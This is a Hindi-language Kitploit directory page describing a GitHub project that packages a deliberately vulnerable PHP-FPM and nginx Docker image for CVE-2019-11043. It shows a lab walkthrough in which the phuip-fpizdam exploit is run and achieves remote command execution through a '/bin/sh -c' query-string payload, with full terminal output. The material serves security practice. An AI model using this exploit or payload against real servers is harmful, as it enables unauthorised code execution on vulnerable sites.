Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-11043-Docker — CVE-2019-11043 के लिए डॉकरकृत कमजोर PHP-FPM वातावरण, phuip-fpizdam शोषण को बनाने और चलाने के निर्देशों के साथ दूरस्थ कोड निष्पादन प्राप्त करने के लिए। | Kitploit
उपकरण/GitHubGitHub/akamajoris/cve-2019-11043-docker
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubakamajoris/cve-2019-11043-docker

CVE-2019-11043-Docker

CVE-2019-11043 के लिए डॉकरकृत कमजोर PHP-FPM वातावरण, phuip-fpizdam शोषण को बनाने और चलाने के निर्देशों के साथ दूरस्थ कोड निष्पादन प्राप्त करने के लिए।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
27716 साल पहलेKitploit द्वारा समीक्षित

PHP-FPM (CVE-2019-11043) और nginx के असुरक्षित संस्करण वाली एक डॉकर इमेज।

चलाएँ

docker run --rm -p8080:80 akamajoris/cve-2019-11043 आप वेब एप्लिकेशन को http://your-ip:8080/ पर एक्सेस कर सकेंगे।

शोषण

https://github.com/neex/phuip-fpizdam से एक बाइनरी बनाएँ, फिर

root@kitploit:~

root@debian:~/gopath/bin# curl "localhost:8080/?a=/bin/sh+-c+'which+which'"
1
root@debian:~/gopath/bin#./phuip-fpizdam http://localhost:8080/index.php
2019/10/24 08:53:00 Base status code is 200
2019/10/24 08:53:00 Status code 502 for qsl=1765, adding as a candidate
2019/10/24 08:53:00 The target is probably vulnerable. Possible QSLs: [1755 1760 1765]
2019/10/24 08:53:00 Attack params found: --qsl 1755 --pisos 182 --skip-detect
2019/10/24 08:53:00 Trying to set "session.auto_start=0"...
2019/10/24 08:53:00 Detect() returned attack params: --qsl 1755 --pisos 182 --skip-detect <-- REMEMBER THIS
2019/10/24 08:53:00 Performing attack using php.ini settings...
2019/10/24 08:53:00 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs
2019/10/24 08:53:00 Trying to cleanup /tmp/a...
2019/10/24 08:53:00 Done!
root@debian:~/gopath/bin# curl "localhost:8080/?a=/bin/sh+-c+'which+which'"
/usr/bin/which
टूल डाउनलोड करें